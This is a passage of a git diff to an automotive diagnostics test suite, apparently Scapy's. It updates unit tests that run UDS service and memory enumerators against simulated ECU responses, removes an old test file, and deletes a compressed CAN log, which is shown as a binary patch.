[UDS_IOCBIEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es, UDS_IOCBIEnumerator_kwargs={"scan_range": range(0x100)}) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0x100 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beefff" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.dataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + + += UDS_RDEnumerator + +memory = dict() + +for addr in itertools.chain(range(0x1f00), range(0xd000, 0xfff2), range(0xa000, 0xcf00), range(0x2000, 0x5f00)): + memory[addr] = addr & 0xff + +def answers_rd(resp, req): + global memory + if req.service != 0x34: + return False + if req.memorySizeLen in [1, 3, 4]: + return False + if req.memoryAddressLen in [1, 3, 4]: + return False + addr = getattr(req, "memoryAddress%d" % req.memoryAddressLen) + if addr not in memory.keys(): + return False + resp.memorySizeLen = req.memorySizeLen + return True + +resps = [EcuResponse(None, [UDS()/UDS_RDPR()], answers=answers_rd), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="requestOutOfRange", requestServiceId="RequestDownload")])] + +####################################################### +scanner = executeScannerInVirtualEnvironment( + resps, [UDS_RDEnumerator], UDS_RDEnumerator_kwargs={"unittest": True}) + +assert scanner.scan_completed +tc1 = scanner.configuration.test_cases[0] + +assert len(tc1.results_without_response) < 10 +if len(tc1.results_without_response): + tc1.show() + +assert len(tc1.results_with_negative_response) > 400 +assert len(tc1.results_with_positive_response) > 40 +assert len(tc1.scanned_states) == 1 + +result = tc1.show(dump=True) + +assert "requestOutOfRange received " in result + += UDS_RMBAEnumerator +~ not_pypy + +memory = dict() + +mem_areas = [(0x100, 0x1f00), (0xd000, 0xff00), (0xa000, 0xc000), (0x3000, 0x5f00)] + +mem_ranges = [range(s, e) for s, e in mem_areas] + +mem_inner_borders = [s for s, _ in mem_areas] +mem_inner_borders += [e - 1 for _, e in mem_areas] + +mem_outer_borders = [s - 1 for s, _ in mem_areas] +mem_outer_borders += [e for _, e in mem_areas] + +mem_random_test_points = [] +for _ in range(100): + mem_random_test_points += [random.choice(list(itertools.chain(*mem_ranges)))] + +for addr in itertools.chain(*mem_ranges): + memory[addr] = addr & 0xff + +def answers_rmba(resp, req): + global memory + if req.service != 0x23: + return False + if req.memorySizeLen in [1, 3, 4]: + return False + if req.memoryAddressLen in [1, 3, 4]: + return False + addr = getattr(req, "memoryAddress%d" % req.memoryAddressLen) + if addr not in memory.keys(): + return False + out_mem = list() + size = getattr(req, "memorySize%d" % req.memorySizeLen) + for i in range(addr, addr + size): + try: + out_mem.append(memory[i]) + except KeyError: + pass + resp.dataRecord = bytes(out_mem) + return True + +resps = [EcuResponse(None, [UDS()/UDS_RMBAPR(dataRecord=b'')], answers=answers_rmba), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="requestOutOfRange", requestServiceId="ReadMemoryByAddress")])] + +####################################################### +scanner = executeScannerInVirtualEnvironment( + resps, [UDS_RMBAEnumerator], + UDS_RMBARandomEnumerator_kwargs={"unittest": True}) + +assert scanner.scan_completed +tc1 = scanner.configuration.stages[0][1] + +assert len(tc1.results_without_response) < 30 +if len(tc1.results_without_response): + tc1.show() + +assert len(tc1.results_with_negative_response) > 100 +assert len(tc1.results_with_positive_response) > 300 +assert len(tc1.scanned_states) == 1 + +result = tc1.show(dump=True) + +assert "requestOutOfRange received " in result + +############################################################ + +addrs = tc1._get_memory_addresses_from_results(tc1.results_with_positive_response) + +print(float([tp in addrs for tp in mem_inner_borders].count(True)) / len(mem_inner_borders)) +assert float([tp in addrs for tp in mem_inner_borders].count(True)) / len(mem_inner_borders) > 0.8 +print(float([tp in addrs for tp in mem_random_test_points].count(True)) / len(mem_random_test_points)) +assert float([tp in addrs for tp in mem_random_test_points].count(True)) / len(mem_random_test_points) > 0.8 +print(float([tp in addrs for tp in mem_outer_borders].count(True)) / len(mem_outer_borders)) +assert float([tp not in addrs for tp in mem_outer_borders].count(True)) / len(mem_outer_borders) > 0.8 + + += UDS_TDEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_TDPR(blockSequenceCounter=1)]), + EcuResponse(None, [UDS()/UDS_TDPR(blockSequenceCounter=3)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="TransferData")])] + +es = [UDS_TDEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 2 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "subFunctionNotSupported received" in result + +ids = [t.req.blockSequenceCounter for t in tc.results_with_positive_response] + +assert 1 in ids +assert 3 in ids + ++ Cleanup + += Delete testsockets + +cleanup_testsockets() \ No newline at end of file diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 5dc0c09d45a..131e7b2f3b6 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -135,10 +135,9 @@ assert erpr.powerDownTime == 0x10 = Check UDS_ERPR modifies ecu state -erpr = UDS(b'\x51\x04\x10') +erpr = UDS(b'\x51\x01') assert erpr.service == 0x51 -assert erpr.resetType == 0x04 -assert erpr.powerDownTime == 0x10 +assert erpr.resetType == 0x01 ecu = Ecu() ecu.state.security_level = 5 diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 092300f2574..e69de29bb2d 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -1,95 +0,0 @@ -% Regression tests for uds_utils -~ needs_root not_pypy automotive_comm disabled - -+ Configuration -~ conf - -= Imports - -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) - - -############ -############ -+ Load general modules - -= Load contribution layer -load_contrib("automotive.uds", globals_dict=globals()) - -= Test Session Enumerator -drain_bus(iface0) -drain_bus(iface1) - -packet = ISOTP(b'Request') -succ = False - -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x241, did=0x641, basecls=UDS) as sendSock, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x641, did=0x241, basecls=UDS) as recvSock: - def answer(pkt): - pkt.service = pkt.service + 0x40 - recvSock.send(pkt) - def sniffer(): - global sniffed, succ - sniffed = 0 - pkts = recvSock.sniff(timeout=10, prn=answer) - sniffed = len(pkts) - succ = True - threadSniffer = threading.Thread(target=sniffer) - threadSniffer.start() - sessions = UDS_SessionEnumerator(sendSock, session_range=range(3)) - threadSniffer.join(timeout=30) - -assert sniffed == 3*2 -assert succ - - -= Test Service Enumerator -drain_bus(iface0) -drain_bus(iface1) - -packet = ISOTP(b'Request') -succ = False - -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x241, did=0x641, basecls=UDS) as sendSock, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x641, did=0x241, basecls=UDS) as recvSock: - def answer(pkt): - pkt.service = pkt.service + 0x40 - if pkt.service == 0x7f: - pkt = UDS()/UDS_NR(requestServiceId=0x3f) - recvSock.send(pkt) - def sniffer(): - global sniffed, succ - sniffed = 0 - pkts = recvSock.sniff(timeout=10, prn=answer) - sniffed = len(pkts) - succ = True - threadSniffer = threading.Thread(target=sniffer) - threadSniffer.start() - services = UDS_ServiceEnumerator(sendSock) - threadSniffer.join(timeout=30) - -assert sniffed == 128 -assert succ - - -= Test getTableEntry -a = ('DefaultSession', UDS()/UDS_SAPR()) -b = ('ProgrammingSession', UDS()/UDS_NR(requestServiceId=0x10, negativeResponseCode=0x13)) -c = ('ExtendedDiagnosticSession', UDS()/UDS_IOCBI()) - -res_a = getTableEntry(a) -res_b = getTableEntry(b) -res_c = getTableEntry(c) - -#make_lined_table([a, b, c], getTableEntry) - -assert res_a == ('DefaultSession', '0x27: SecurityAccess', 'PositiveResponse') -assert res_b == ('ProgrammingSession', '0x10: DiagnosticSessionControl', 'incorrectMessageLengthOrInvalidFormat') -assert res_c == ('ExtendedDiagnosticSession', '0x2f: InputOutputControlByIdentifier', 'PositiveResponse') - -+ Cleanup - -= Delete vcan interfaces - -assert cleanup_interfaces() diff --git a/test/pcaps/candump_gmlan_scanner.log.gz b/test/pcaps/candump_gmlan_scanner.log.gz deleted file mode 100644 index c9d2fefdf5ae91884fd34771a65db9ecd52688c5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 28893 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 